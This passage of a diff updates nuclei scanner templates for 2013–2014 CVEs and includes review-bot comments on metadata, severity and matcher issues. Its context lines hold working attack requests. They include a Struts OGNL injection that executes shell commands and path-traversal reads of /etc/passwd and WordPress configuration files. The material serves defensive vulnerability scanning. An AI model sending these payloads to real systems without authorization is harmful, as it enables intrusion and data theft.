@@ -10,15 +10,20 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2013-2248 - https://cwiki.apache.org/confluence/display/WW/S2-017 - http://struts.apache.org/release/2.3.x/docs/s2-017.html + - http://www.fujitsu.com/global/support/software/security/products-f/interstage-bpm-analytics-201301e.html remediation: Developers should immediately upgrade to Struts 2.3.15.1 or later. classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cwe-id: CWE-601 + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:N + cvss-score: 5.8 cve-id: CVE-2013-2248 - tags: cve,cve2013,apache,redirect,struts,edb + cwe-id: CWE-20 + epss-score: 0.97324 + cpe: cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: apache + product: struts + tags: cve,cve2013,apache,redirect,struts,edb http: - method: GET @@ -27,6 +32,6 @@ http: matchers: - type: regex + part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' - part: header diff --git a/http/cves/2013/CVE-2013-2251.yaml b/http/cves/2013/CVE-2013-2251.yaml index 85eb111bcd..6101561478 100644 --- a/http/cves/2013/CVE-2013-2251.yaml +++ b/http/cves/2013/CVE-2013-2251.yaml @@ -9,15 +9,21 @@ info: - http://struts.apache.org/release/2.3.x/docs/s2-016.html - https://cwiki.apache.org/confluence/display/WW/S2-016 - https://nvd.nist.gov/vuln/detail/CVE-2013-2251 + - http://archiva.apache.org/security.html + - http://cxsecurity.com/issue/WLB-2014010087 remediation: Developers should immediately upgrade to Struts 2.3.15.1 or later. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:C/I:C/A:C cvss-score: 9.3 cve-id: CVE-2013-2251 cwe-id: CWE-20 - tags: cve,cve2013,rce,struts,apache,ognl,kev + epss-score: 0.97432 + cpe: cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:* metadata: max-request: 9 + vendor: apache + product: struts + tags: cve,cve2013,rce,struts,apache,ognl,kev http: - raw: 
@@ -25,12 +31,10 @@ http: GET /index.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1 Host: {{Hostname}} Accept: */* - - | GET /login.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1 Host: {{Hostname}} Accept: */* - - | GET /index.action?{{params}}%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1 Host: {{Hostname}} @@ -44,13 +48,13 @@ http: matchers-condition: and matchers: - - type: status - condition: or - status: - - 200 - - 400 - - type: regex part: body regex: - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)" + + - type: status + status: + - 200 + - 400 + condition: or 
diff --git a/http/cves/2013/CVE-2013-2287.yaml b/http/cves/2013/CVE-2013-2287.yaml index 8288fe467f..c7259eb354 100644 --- a/http/cves/2013/CVE-2013-2287.yaml +++ b/http/cves/2013/CVE-2013-2287.yaml @@ -10,12 +10,16 @@ info: - https://www.dognaedis.com/vulns/DGS-SEC-16.html classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 cve-id: CVE-2013-2287 cwe-id: CWE-79 - cvss-score: 4.3 + epss-score: 0.00219 + cpe: cpe:2.3:a:roberta_bramski:uploader:1.0.4:*:*:*:*:*:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/uploader" + vendor: roberta_bramski + product: uploader tags: cve,cve2013,wordpress,xss,wp-plugin http: @@ -26,9 +30,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2013/CVE-2013-2621.yaml b/http/cves/2013/CVE-2013-2621.yaml index ed6f87803b..03c32b67aa 100644 --- a/http/cves/2013/CVE-2013-2621.yaml +++ b/http/cves/2013/CVE-2013-2621.yaml @@ -1,4 +1,5 @@ id: CVE-2013-2621 + info: name: Telaen => v1.3.1 - Open Redirect author: ctflearner @@ -14,9 +15,12 @@ info: cvss-score: 6.1 cve-id: CVE-2013-2621 cwe-id: CWE-601 + epss-score: 0.03238 cpe: cpe:2.3:a:telaen_project:telaen:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: telaen_project + product: telaen tags: cve,cve2012,telaen,redirect http: @@ -26,6 +30,7 @@ http: - "{{BaseURL}}/redir.php?https://interact.sh" stop-at-first-match: true + matchers-condition: and matchers: - type: regex diff --git a/http/cves/2013/CVE-2013-3526.yaml b/http/cves/2013/CVE-2013-3526.yaml index ede67f8eb4..b0939b8c2e 100644 --- a/http/cves/2013/CVE-2013-3526.yaml +++ b/http/cves/2013/CVE-2013-3526.yaml 
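Review bot: `framework: wordpress` is not added to the metadata in this hunk and the new `cpe` keeps `*` in the target_sw field, while the other WordPress plugin templates in this diff (CVE-2013-6281, CVE-2014-4513, CVE-2014-4535 through CVE-2014-4592, CVE-2014-4940) get `framework: wordpress` and a CPE ending in `:wordpress:*:*`. The same omission applies to CVE-2013-3526, CVE-2013-4117, CVE-2013-4625 and CVE-2013-7240, all of which carry the `wp-plugin` tag. Consumers that select templates by `framework` will miss these, so adding `framework: wordpress` beside the new `vendor:`/`product:` lines keeps the set consistent. The CPE target_sw value should be taken from the NVD record rather than edited by hand.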
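Review bot: As rendered on this page the only entry under `words:` in the matcher hunk is the empty string `""`, here and in the sibling hunks for CVE-2013-3526, CVE-2013-3827, CVE-2013-4117, CVE-2013-4625, CVE-2014-4513, CVE-2014-4544 and CVE-2014-4592. That is most likely the page stripping an HTML-looking marker string (the `'>` and `">` fragments left in CVE-2014-4535 and CVE-2014-4536 point the same way), but if the file really holds an empty word the matcher is satisfied by every response and `matchers-condition: and` collapses to the header check alone. Worth opening the file to confirm the reflected marker is intact, since the commit only moves `part: body` above `words:` and does not touch the value.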
@@ -8,15 +8,19 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2013-3526 - http://packetstormsecurity.com/files/121167/WordPress-Traffic-Analyzer-Cross-Site-Scripting.html - - http://web.archive.org/web/20210123051939/https://www.securityfocus.com/bid/58948/ + - https://exchange.xforce.ibmcloud.com/vulnerabilities/83311 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2013-3526 cwe-id: CWE-79 + epss-score: 0.00431 + cpe: cpe:2.3:a:wptrafficanalyzer:trafficanalyzer:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/trafficanalyzer" + vendor: wptrafficanalyzer + product: trafficanalyzer tags: packetstorm,cve,cve2013,wordpress,xss,wp-plugin http: @@ -27,9 +31,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2013/CVE-2013-3827.yaml b/http/cves/2013/CVE-2013-3827.yaml index afa402a23a..cd199f9b77 100644 --- a/http/cves/2013/CVE-2013-3827.yaml +++ b/http/cves/2013/CVE-2013-3827.yaml @@ -10,14 +10,19 @@ info: - https://www.exploit-db.com/exploits/38802 - https://www.oracle.com/security-alerts/cpuoct2013.html - http://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html + - http://rhn.redhat.com/errata/RHSA-2014-0029.html classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2013-3827 cwe-id: NVD-CWE-noinfo - tags: edb,cve,cve2013,lfi,javafaces,oracle + epss-score: 0.1225 + cpe: cpe:2.3:a:oracle:fusion_middleware:2.1.1:*:*:*:*:*:*:* metadata: max-request: 10 + vendor: oracle + product: fusion_middleware + tags: edb,cve,cve2013,lfi,javafaces,oracle http: - method: GET @@ -34,13 +39,14 @@ http: - "{{BaseURL}}/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.." stop-at-first-match: true + matchers-condition: and matchers: - type: word + part: body words: - "" - part: body condition: and - type: status 
diff --git a/http/cves/2013/CVE-2013-4117.yaml b/http/cves/2013/CVE-2013-4117.yaml index 3c237ea63a..163112e734 100644 --- a/http/cves/2013/CVE-2013-4117.yaml +++ b/http/cves/2013/CVE-2013-4117.yaml @@ -9,15 +9,21 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2013-4117 - http://openwall.com/lists/oss-security/2013/07/11/11 - http://seclists.org/bugtraq/2013/Jul/17 + - http://exploit.iedb.ir/exploits-177.html + - http://packetstormsecurity.com/files/122259/WordPress-Category-Grid-View-Gallery-XSS.html classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2013-4117 cwe-id: CWE-79 + epss-score: 0.01217 + cpe: cpe:2.3:a:anshul_sharma:category-grid-view-gallery:2.3.1:*:*:*:*:*:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/category-grid-view-gallery" - tags: cve2013,wordpress,xss,wp-plugin,seclists,cve + vendor: anshul_sharma + product: category-grid-view-gallery + tags: seclists,packetstorm,cve2013,wordpress,xss,wp-plugin,cve http: - method: GET @@ -27,9 +33,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2013/CVE-2013-4625.yaml b/http/cves/2013/CVE-2013-4625.yaml index 8ce8d38550..4ebcddd057 100644 --- a/http/cves/2013/CVE-2013-4625.yaml +++ b/http/cves/2013/CVE-2013-4625.yaml 
@@ -10,15 +10,20 @@ info: - https://packetstormsecurity.com/files/122535/WordPress-Duplicator-0.4.4-Cross-Site-Scripting.html - https://seclists.org/bugtraq/2013/Jul/160 - https://www.htbridge.com/advisory/HTB23162 + - http://packetstormsecurity.com/files/122535/WordPress-Duplicator-0.4.4-Cross-Site-Scripting.html remediation: Upgrade to Duplicator 0.4.5 or later. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2013-4625 cwe-id: CWE-79 + epss-score: 0.01062 + cpe: cpe:2.3:a:cory_lamle:duplicator:*:*:*:*:*:*:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/duplicator" + vendor: cory_lamle + product: duplicator tags: seclists,cve,cve2013,wordpress,xss,wp-plugin,packetstorm http: @@ -29,9 +34,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2013/CVE-2013-5528.yaml b/http/cves/2013/CVE-2013-5528.yaml index 9174141042..bec4181ac9 100644 --- a/http/cves/2013/CVE-2013-5528.yaml +++ b/http/cves/2013/CVE-2013-5528.yaml 
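Review bot: The added reference `http://packetstormsecurity.com/files/122535/WordPress-Duplicator-0.4.4-Cross-Site-Scripting.html` duplicates the first entry in the list, which is the same path over https. Keep the https form and drop the new http line so the metadata neither repeats itself nor links over plaintext.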
@@ -3,21 +3,24 @@ id: CVE-2013-5528 info: name: Cisco Unified Communications Manager 7/8/9 - Directory Traversal author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the Tomcat administrative web interface in Cisco Unified Communications Manager allows remote authenticated users to read arbitrary files via directory traversal sequences in an unspecified input string, aka Bug ID CSCui78815 reference: - https://www.exploit-db.com/exploits/40887 - https://nvd.nist.gov/vuln/detail/CVE-2014-3120 - http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-5528 - - http://web.archive.org/web/20210122130958/https://www.securityfocus.com/bid/62960/ classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:S/C:P/I:N/A:N cvss-score: 4 cve-id: CVE-2013-5528 cwe-id: CWE-22 - tags: cve,cve2013,lfi,cisco,edb + epss-score: 0.00442 + cpe: cpe:2.3:a:cisco:unified_communications_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: cisco + product: unified_communications_manager + tags: cve,cve2013,lfi,cisco,edb http: - method: GET @@ -26,7 +29,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2013/CVE-2013-5979.yaml b/http/cves/2013/CVE-2013-5979.yaml index 3ba4a66f34..76c2b6ae72 100644 --- a/http/cves/2013/CVE-2013-5979.yaml +++ b/http/cves/2013/CVE-2013-5979.yaml 
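Review bot: The second reference in this hunk, `https://nvd.nist.gov/vuln/detail/CVE-2014-3120`, points at the Elasticsearch CVE rather than this template's `cve-id: CVE-2013-5528`; the commit reshuffles the classification but leaves the wrong link as context. It should read `- https://nvd.nist.gov/vuln/detail/CVE-2013-5528`. Since the new `cpe`, `epss-score` and `severity: medium` values look NVD-derived, it is worth confirming they were pulled for CVE-2013-5528 and not for the CVE named in that link.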
@@ -3,20 +3,25 @@ id: CVE-2013-5979 info: name: Xibo 1.2.2/1.4.1 - Directory Traversal author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in Spring Signage Xibo 1.2.x before 1.2.3 and 1.4.x before 1.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the p parameter to index.php. reference: - https://www.exploit-db.com/exploits/26955 - https://nvd.nist.gov/vuln/detail/CVE-2013-5979 - https://bugs.launchpad.net/xibo/+bug/1093967 + - http://www.baesystemsdetica.com.au/Research/Advisories/Xibo-Directory-Traversal-Vulnerability-(DS-2013-00 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2013-5979 cwe-id: CWE-22 - tags: cve,cve2013,lfi,edb + epss-score: 0.07589 + cpe: cpe:2.3:a:springsignage:xibo:1.2.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: springsignage + product: xibo + tags: cve,cve2013,lfi,edb http: - method: GET @@ -25,7 +30,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2013/CVE-2013-6281.yaml b/http/cves/2013/CVE-2013-6281.yaml index ed991df906..1630af6d2e 100644 --- a/http/cves/2013/CVE-2013-6281.yaml +++ b/http/cves/2013/CVE-2013-6281.yaml @@ -13,14 +13,19 @@ info: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6281 - https://nvd.nist.gov/vuln/detail/CVE-2013-6281 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 cve-id: CVE-2013-6281 cwe-id: CWE-79 + epss-score: 0.00209 + cpe: cpe:2.3:a:dhtmlx:dhtmlxspreadsheet:2.0:-:*:*:*:wordpress:*:* metadata: max-request: 1 google-query: inurl:/wp-content/plugins/dhtmlxspreadsheet verified: true + framework: wordpress + vendor: dhtmlx + product: dhtmlxspreadsheet tags: wp,wpscan,cve,cve2013,wordpress,xss,wp-plugin http: 
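Review bot: The reference added in this hunk, `http://www.baesystemsdetica.com.au/Research/Advisories/Xibo-Directory-Traversal-Vulnerability-(DS-2013-00`, is cut off mid-identifier and leaves an unbalanced parenthesis, so it is not a usable link. Either complete the URL from wherever it was copied or drop the line; a YAML lint pass will not catch this because it is still a valid plain scalar.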
diff --git a/http/cves/2013/CVE-2013-7091.yaml b/http/cves/2013/CVE-2013-7091.yaml index febdda4444..05d42a4de2 100644 --- a/http/cves/2013/CVE-2013-7091.yaml +++ b/http/cves/2013/CVE-2013-7091.yaml @@ -3,21 +3,26 @@ id: CVE-2013-7091 info: name: Zimbra Collaboration Server 7.2.2/8.0.2 Local File Inclusion author: rubina119 - severity: critical + severity: medium description: A directory traversal vulnerability in /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz in Zimbra 7.2.2 and 8.0.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the skin parameter. This can be leveraged to execute arbitrary code by obtaining LDAP credentials and accessing the service/admin/soap API. reference: - https://nvd.nist.gov/vuln/detail/CVE-2013-7091 - https://www.exploit-db.com/exploits/30085 - https://www.exploit-db.com/exploits/30472 - http://www.exploit-db.com/exploits/30085 + - http://packetstormsecurity.com/files/124321 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2013-7091 cwe-id: CWE-22 - tags: zimbra,lfi,edb,cve,cve2013 + epss-score: 0.97375 + cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:6.0.0:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: synacor + product: zimbra_collaboration_suite + tags: packetstorm,zimbra,lfi,edb,cve,cve2013 http: - method: GET @@ -26,6 +31,7 @@ http: - "{{BaseURL}}/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00" stop-at-first-match: true + matchers-condition: or matchers: - type: word diff --git a/http/cves/2013/CVE-2013-7240.yaml b/http/cves/2013/CVE-2013-7240.yaml index 2e99af565b..ddcf90e79c 100644 --- a/http/cves/2013/CVE-2013-7240.yaml +++ b/http/cves/2013/CVE-2013-7240.yaml 
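Review bot: `severity` drops from critical to medium on the strength of the CVSS v2 5.0 score, while the `description` two lines below states the file read can be leveraged to execute arbitrary code via recovered LDAP credentials and the new `epss-score: 0.97375` places the CVE near the top of the exploitation-probability scale. Severity is what most users filter scans on, so the chained impact the template itself documents deserves to stay in the rating, e.g. `severity: high`; if the policy is to follow the NVD base score strictly, a one-line comment next to the field saying so would keep the next reviewer from bumping it back.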
@@ -3,21 +3,26 @@ id: CVE-2013-7240 info: name: WordPress Plugin Advanced Dewplayer 1.2 - Directory Traversal author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in download-file.php in the Advanced Dewplayer plugin 1.2 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the dew_file parameter. reference: - https://www.exploit-db.com/exploits/38936 - https://nvd.nist.gov/vuln/detail/CVE-2013-7240 - https://wordpress.org/support/topic/security-vulnerability-cve-2013-7240-directory-traversal/ - http://seclists.org/oss-sec/2013/q4/570 + - http://seclists.org/oss-sec/2013/q4/566 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2013-7240 cwe-id: CWE-22 + epss-score: 0.19842 + cpe: cpe:2.3:a:westerndeal:advanced_dewplayer:1.2:*:*:*:*:*:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/advanced-dewplayer/" + vendor: westerndeal + product: advanced_dewplayer tags: wp-plugin,lfi,edb,seclists,cve,cve2013,wordpress http: @@ -28,12 +33,12 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "DB_NAME" - "DB_PASSWORD" - "DB_HOST" - "The base configurations of the WordPress" - part: body condition: and - type: status diff --git a/http/cves/2013/CVE-2013-7285.yaml b/http/cves/2013/CVE-2013-7285.yaml index 7b515b8b66..010ecc9527 100644 --- a/http/cves/2013/CVE-2013-7285.yaml +++ b/http/cves/2013/CVE-2013-7285.yaml @@ -17,11 +17,13 @@ info: cvss-score: 9.8 cve-id: CVE-2013-7285 cwe-id: CWE-78 - cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* epss-score: 0.33561 - tags: cve,cve2013,xstream,deserialization,rce,oast + cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: xstream_project + product: xstream + tags: cve,cve2013,xstream,deserialization,rce,oast http: - raw: 
diff --git a/http/cves/2014/CVE-2014-10037.yaml b/http/cves/2014/CVE-2014-10037.yaml index 7d9ba4d2df..99aebf0b90 100644 --- a/http/cves/2014/CVE-2014-10037.yaml +++ b/http/cves/2014/CVE-2014-10037.yaml @@ -9,14 +9,19 @@ info: - https://www.exploit-db.com/exploits/30865 - https://nvd.nist.gov/vuln/detail/CVE-2014-10037 - http://www.exploit-db.com/exploits/30865 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/90582 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2014-10037 cwe-id: CWE-22 - tags: cve,cve2014,lfi,edb + epss-score: 0.22143 + cpe: cpe:2.3:a:domphp:domphp:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: domphp + product: domphp + tags: cve,cve2014,lfi,edb http: - method: GET @@ -25,7 +30,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2014/CVE-2014-1203.yaml b/http/cves/2014/CVE-2014-1203.yaml index 345113c27a..df2b61659a 100644 --- a/http/cves/2014/CVE-2014-1203.yaml +++ b/http/cves/2014/CVE-2014-1203.yaml @@ -14,11 +14,13 @@ info: cvss-score: 9.8 cve-id: CVE-2014-1203 cwe-id: CWE-77 - cpe: cpe:2.3:a:eyou:eyou:*:*:*:*:*:*:*:* epss-score: 0.02045 - tags: seclists,rce,eyou + cpe: cpe:2.3:a:eyou:eyou:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: eyou + product: eyou + tags: seclists,rce,eyou http: - raw: @@ -32,9 +34,9 @@ http: matchers-condition: and matchers: - type: regex + part: body regex: - "root:.*:0:0:" - part: body - type: status status: diff --git a/http/cves/2014/CVE-2014-2321.yaml b/http/cves/2014/CVE-2014-2321.yaml index 17804f4e58..3225be3f89 100644 --- a/http/cves/2014/CVE-2014-2321.yaml +++ b/http/cves/2014/CVE-2014-2321.yaml 
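Review bot: The relocated `tags: seclists,rce,eyou` line in the CVE-2014-1203 hunk still lacks the `cve` and `cve2014` tags that every other CVE template in this diff carries (compare `tags: cve,cve2014,lfi,edb` in the CVE-2014-10037 hunk just above). Runs selected with `-tags cve` or `-tags cve2014` will not include this template even though it lives under `http/cves/2014/`. Suggest `tags: cve,cve2014,seclists,rce,eyou`.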
@@ -3,7 +3,7 @@ id: CVE-2014-2321 info: name: ZTE Cable Modem Web Shell author: geeknik - severity: high + severity: critical description: | ZTE F460 and F660 cable modems allows remote attackers to obtain administrative access via sendcmd requests to web_shell_cmd.gch, as demonstrated by using "set TelnetCfg" commands to enable a TELNET service with specified credentials. reference: @@ -11,14 +11,19 @@ info: - https://jalalsela.com/zxhn-h108n-router-web-shell-secrets/ - https://nvd.nist.gov/vuln/detail/CVE-2014-2321 - http://www.kb.cert.org/vuls/id/600724 + - http://www.myxzy.com/post-411.html classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C cvss-score: 10 cve-id: CVE-2014-2321 cwe-id: CWE-264 - tags: iot,cve,cve2014,zte + epss-score: 0.96364 + cpe: cpe:2.3:h:zte:f460:-:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: zte + product: f460 + tags: iot,cve,cve2014,zte http: - method: GET @@ -28,10 +33,10 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "please input shell command" - "ZTE Corporation. All rights reserved" - part: body condition: and - type: status diff --git a/http/cves/2014/CVE-2014-2323.yaml b/http/cves/2014/CVE-2014-2323.yaml index 54d5c2eb08..1c6d087629 100644 --- a/http/cves/2014/CVE-2014-2323.yaml +++ b/http/cves/2014/CVE-2014-2323.yaml @@ -10,15 +10,19 @@ info: - https://download.lighttpd.net/lighttpd/security/lighttpd_sa_2014_01.txt - http://www.lighttpd.net/2014/3/12/1.4.35/ - http://seclists.org/oss-sec/2014/q1/561 + - http://jvn.jp/en/jp/JVN37417423/index.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2014-2323 cwe-id: CWE-89 - epss-score: 0.97012 - tags: lighttpd,injection,seclists,cve,cve2014,sqli + epss-score: 0.96912 + cpe: cpe:2.3:a:lighttpd:lighttpd:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: lighttpd + product: lighttpd + tags: lighttpd,injection,seclists,cve,cve2014,sqli http: - raw: 
diff --git a/http/cves/2014/CVE-2014-2383.yaml b/http/cves/2014/CVE-2014-2383.yaml index 7119fedfae..d01b7cc8fd 100644 --- a/http/cves/2014/CVE-2014-2383.yaml +++ b/http/cves/2014/CVE-2014-2383.yaml @@ -3,7 +3,7 @@ id: CVE-2014-2383 info: name: Dompdf < v0.6.0 - Local File Inclusion author: 0x_Akoko,akincibor,ritikchaddha - severity: high + severity: medium description: | A vulnerability in dompdf.php in dompdf before 0.6.1, when DOMPDF_ENABLE_PHP is enabled, allows context-dependent attackers to bypass chroot protections and read arbitrary files via a PHP protocol and wrappers in the input_file parameter, as demonstrated by a php://filter/read=convert.base64-encode/resource in the input_file parameter. reference: @@ -13,13 +13,17 @@ info: - https://wpscan.com/vulnerability/1d64d0cb-6b71-47bb-8807-7c8350922582 - https://nvd.nist.gov/vuln/detail/CVE-2014-2383 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P + cvss-score: 6.8 cve-id: CVE-2014-2383 + cwe-id: CWE-200 + epss-score: 0.00723 + cpe: cpe:2.3:a:dompdf:dompdf:*:beta3:*:*:*:*:*:* metadata: max-request: 11 verified: true + vendor: dompdf + product: dompdf tags: cve,lfi,wp-plugin,wpscan,cve2014,dompdf,wordpress,wp,edb,seclists http: @@ -38,19 +42,20 @@ http: - "{{BaseURL}}/wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd" stop-at-first-match: true + matchers-condition: and matchers: + - type: word + part: header + words: + - "application/pdf" + - 'filename="dompdf_out.pdf"' + condition: and + - type: regex regex: - "root:[x*]:0:0" - - type: word - words: - - "application/pdf" - - 'filename="dompdf_out.pdf"' - part: header - condition: and - - type: status status: - 200 diff --git a/http/cves/2014/CVE-2014-2908.yaml b/http/cves/2014/CVE-2014-2908.yaml index 2e188fe5d5..255676e3d2 100644 --- a/http/cves/2014/CVE-2014-2908.yaml 
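Review bot: Adding `matchers-condition: and` changes what this template reports: the header, body-regex and status matchers previously combined with nuclei's default OR, so a bare 200 or a PDF content-type alone counted as a hit, and now all three must hold. That is the right direction for false positives, but the body regex `root:[x*]:0:0` now has to match inside the generated PDF; if dompdf compresses its content streams the plain-text pattern would never be found and the template would go silent. The metadata keeps `verified: true` from before this change, so the template should be re-run against a known-vulnerable instance and the flag refreshed. The enclosing request block starts outside the hunk.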
+++ b/http/cves/2014/CVE-2014-2908.yaml @@ -10,15 +10,20 @@ info: - https://cert-portal.siemens.com/productcert/pdf/ssa-892012.pdf - https://nvd.nist.gov/vuln/detail/CVE-2014-2908 - http://ics-cert.us-cert.gov/advisories/ICSA-14-114-02 + - http://www.siemens.com/innovation/pool/de/forschungsfelder/siemens_security_advisory_ssa-892012.pdf remediation: Upgrade to v4.0 or later. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2014-2908 cwe-id: CWE-79 - tags: cve,cve2014,xss,siemens,edb + epss-score: 0.00594 + cpe: cpe:2.3:o:siemens:simatic_s7_cpu_1200_firmware:2.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: siemens + product: simatic_s7_cpu_1200_firmware + tags: cve,cve2014,xss,siemens,edb http: - method: GET diff --git a/http/cves/2014/CVE-2014-2962.yaml b/http/cves/2014/CVE-2014-2962.yaml index 054830da05..3038091383 100644 --- a/http/cves/2014/CVE-2014-2962.yaml +++ b/http/cves/2014/CVE-2014-2962.yaml @@ -10,15 +10,20 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2014-2962l - http://www.kb.cert.org/vuls/id/774788 - http://www.belkin.com/us/support-article?articleNum=109400 + - https://www.exploit-db.com/exploits/38488/ remediation: Ensure that appropriate firewall rules are in place to restrict access to port 80/tcp from external untrusted sources. classification: cvss-metrics: 